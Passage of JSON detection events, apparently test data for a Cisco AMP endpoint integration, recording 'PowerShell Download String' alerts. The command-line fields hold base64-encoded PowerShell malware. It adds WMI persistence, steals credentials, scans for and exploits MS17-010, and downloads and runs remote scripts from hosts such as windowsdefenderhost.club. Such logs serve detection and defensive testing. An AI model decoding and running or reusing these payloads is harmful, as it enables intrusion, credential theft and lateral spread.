ZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQBy